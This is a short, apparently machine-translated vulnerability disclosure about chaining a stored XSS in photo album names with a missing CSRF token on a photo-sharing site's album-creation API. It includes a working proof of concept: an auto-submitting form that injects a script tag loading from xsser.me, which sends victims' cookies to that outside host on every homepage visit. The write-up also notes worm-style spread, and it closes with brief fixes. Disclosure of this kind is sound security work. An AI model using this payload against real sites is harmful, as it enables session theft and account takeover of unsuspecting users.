When xss of chicken ribs is combined with csrf of chicken ribs ....
0x01. The album name in the photo album is not escaped, which can cause storage-type xss and steal users' cookies. 0x02. No token is provided for creating the photo album in the image album. You can use csrf to create an account as a user. These two vulnerabilities seem to be a weakness, but are they combined? You can use csrf to create an album with xss scripts as a user (and you can also publish a graph to further expand the worm as a user), and the album name will be displayed on the homepage. In this way, each time a victim accesses the home page, the xss code will be executed once, and it is useless for the user to change the password. Once the user accesses the home page, fresh cookies will be sent. The process is as follows: POC:
<Html> <body> <form name = "csrf" action = "http://tuchong.com/api/album/create/" method = "POST"> <input type = text name = type value = "album"> </ input> <input type = text name = title value = "= % 22% 3E % 3 Cscript + src % 3 Dhttp % 3A % 2F % 2Fxsser. me % 2FFNBn0V % 3E % 3C % 2 Fscript % 3E "> </input> <input type =" submit "value =" submit "/> </form> <script> document. csrf. submit (); </script> </body>
This is returned after access. Csed.jpg sends cookies to xsser. me every time!
Solution:
1. For csrf, add token; 2. For xss, escape.